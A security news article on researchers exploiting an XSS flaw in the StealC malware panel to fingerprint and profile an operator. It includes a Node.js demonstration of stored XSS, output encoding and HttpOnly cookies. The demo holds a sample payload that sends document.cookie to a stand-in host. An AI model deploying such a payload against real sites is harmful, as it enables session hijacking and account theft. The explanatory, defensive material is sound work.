Researchers Exploit XSS Bug in StealC Malware Infrastructure

Security researchers have uncovered a weakness inside the web control panel used by operators of the StealC malware, turning the attackers’ own infrastructure into an unexpected source of intelligence.

The flaw is a cross-site scripting (XSS) vulnerability: script injected into the panel executes in the browser of whoever is logged in to it, which let researchers observe activity inside the panel itself. By abusing the bug, analysts collected system fingerprints, tracked live sessions, and even extracted the session cookies of the malware operators.

The discovery came from researchers at CyberArk, who noted the irony of stealing cookies from a platform designed to steal cookies from victims.

What Is StealC?

StealC first appeared in early 2023 and is sold under a malware-as-a-service model. Customers can subscribe to the service and deploy the stealer using ready-made infrastructure. One of its most effective distribution techniques relies on YouTube, where attackers upload videos promoting pirated software. This approach, often called a “YouTube Ghost Network,” disguises malware as cracked versions of popular applications.

Over time, StealC has expanded its delivery methods. Researchers have seen it spread through tampered Blender-related files and social engineering campaigns such as FileFix. The malware itself has also evolved, gaining features like Telegram-based alerts, improved payload delivery, and a redesigned management interface known as StealC V2.

How the XSS Flaw Exposed the Attackers

Weeks after the updated control panel was released, its source code was leaked. That leak gave defenders a rare opportunity to study how the backend worked and ultimately identify the XSS vulnerability.

Rather than publishing the exact exploit details, the researchers kept the technical specifics private, both to avoid handing the malware developers a free patch and to avoid giving copycat criminal operations a recipe.

Using the flaw, analysts were able to gather surprisingly detailed information about at least one StealC customer, including approximate location data, hardware characteristics, and active authentication cookies from the operator’s own machine.

The Irony of Poor Cookie Security

XSS vulnerabilities arise when a web application places untrusted data into a page without encoding it for the context it lands in (HTML body, attribute value, or script), so attacker-supplied JavaScript runs in the browser of whoever views that page, in this case the panel operator. Script running with the operator's session can hijack that session, read whatever the operator can see, and act as the account.

What stood out in this case was that the StealC panel set its session cookie without even the HttpOnly attribute. HttpOnly keeps a cookie out of `document.cookie`, so an XSS payload cannot simply read it and send it elsewhere; without it, the textbook one-liner that posts `document.cookie` to an attacker-controlled server works unchanged, which is how the researchers were able to steal the operators' session cookies.

For a criminal operation built around mass cookie theft, the failure to protect its own cookies highlighted a serious lapse in operational security.
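As an added illustration (not code from the StealC panel, whose leaked source is not reproduced here), the following Node.js snippet shows the generic pattern the article describes: a hypothetical log view that concatenates victim-supplied data straight into HTML, the same view with output encoding, a session cookie issued without HttpOnly beside a hardened one, and a small simulation of which cookies a browser exposes to script through `document.cookie`. The field names, the injected payload, the `example.invalid` callback host and the assumption that a hostname field is the injection point are all constructed for the demonstration.

```javascript
// Added example, not StealC's code. Runs under Node.js with no dependencies.
// Shows stored XSS via unencoded output, the output-encoding fix, and why a
// session cookie without HttpOnly is readable by an XSS payload.

// Minimal HTML entity encoding for text placed in an element body or a
// double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample "log" in the shape a stealer panel might store. Every
// field is chosen by the infected machine, so a victim (or a researcher
// running a bait machine) controls the bytes the operator's browser renders.
// The hostname carrying a payload is an assumption made for this example.
const sampleLog = {
  id: 1,
  hostname: "DESKTOP-01<img src=x onerror=\"fetch('https://example.invalid/?c='+document.cookie)\">",
  country: 'US',
};

// Vulnerable: untrusted values concatenated straight into markup.
function renderLogRowVulnerable(log) {
  return `<tr><td>${log.id}</td><td>${log.hostname}</td><td>${log.country}</td></tr>`;
}

// Hardened: every untrusted value is entity-encoded for its HTML context.
function renderLogRowSafe(log) {
  return `<tr><td>${escapeHtml(log.id)}</td><td>${escapeHtml(log.hostname)}</td>` +
    `<td>${escapeHtml(log.country)}</td></tr>`;
}

// Session cookie as the article describes the panel issuing it: no HttpOnly.
function weakSessionCookie(sid) {
  return `session=${sid}; Path=/`;
}

// Hardened cookie: HttpOnly hides it from document.cookie, Secure restricts it
// to TLS, SameSite=Strict stops cross-site requests from carrying it.
function hardenedSessionCookie(sid) {
  return `session=${sid}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Simulates what document.cookie returns for a set of Set-Cookie headers:
// browsers omit HttpOnly cookies from the script-visible string, so an XSS
// payload that exfiltrates document.cookie only ever sees the rest.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !h.split(';').slice(1)
      .some((attr) => attr.trim().toLowerCase() === 'httponly'))
    .map((h) => h.split(';')[0].trim())
    .join('; ');
}

// Demonstration output.
console.log('vulnerable row:', renderLogRowVulnerable(sampleLog));
console.log('safe row:      ', renderLogRowSafe(sampleLog));
console.log('XSS sees (weak):     ', JSON.stringify(scriptVisibleCookies([weakSessionCookie('abc123')])));
console.log('XSS sees (hardened): ', JSON.stringify(scriptVisibleCookies([hardenedSessionCookie('abc123')])));
```

HttpOnly does not fix the XSS itself: script running in the operator's session can still issue requests to the panel as that operator, read rendered pages and fingerprint the machine, which is the rest of what the researchers collected. Output encoding (or a templating engine that encodes by default) removes the injection; the cookie attributes only limit what a successful injection can walk away with.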

Profiling a StealC Operator

CyberArk also revealed details about a StealC customer known as “YouTubeTA,” short for YouTube Threat Actor. This individual heavily relied on YouTube to distribute StealC by promoting fake cracked versions of Adobe Photoshop and Adobe After Effects.

Researchers estimate that this campaign produced more than 5,000 stolen data logs, including hundreds of thousands of passwords and tens of millions of cookies. Most of the cookies were non-sensitive tracking cookies, but the scale of the operation was still significant.

Evidence suggests the actor used hijacked YouTube accounts to upload more malicious videos, creating a self-sustaining distribution loop. Additional findings point to the use of fake CAPTCHA-style lures, indicating that YouTube was not the only infection vector.

Operational Security Slip Reveals Location

Further analysis of the leaked panel showed that it supports multiple user roles, including administrators and standard users. In the case of YouTubeTA, the panel appeared to have a single admin account.

That account revealed clues about the operator’s environment, including language settings and hardware details pointing to an Apple M3-based system. In a critical mistake, the actor reportedly accessed the panel without using a VPN in mid-2025, briefly exposing a real IP address linked to a Ukrainian internet provider.

Based on the available data, researchers believe the individual is likely operating alone from Eastern Europe, in a region where Russian is commonly used.

A Broader Lesson About Malware-as-a-Service

The findings highlight a recurring theme in the malware economy. While MaaS platforms make it easier for criminals to scale attacks quickly, they also introduce risks similar to those faced by legitimate SaaS businesses.

Weak code quality, poor security practices, and rushed development can expose attackers to surveillance and identification.

Researchers say this case demonstrates how flaws in criminal infrastructure can be leveraged by defenders and law enforcement to gain insight into malware operations and, in some cases, unmask the people behind them.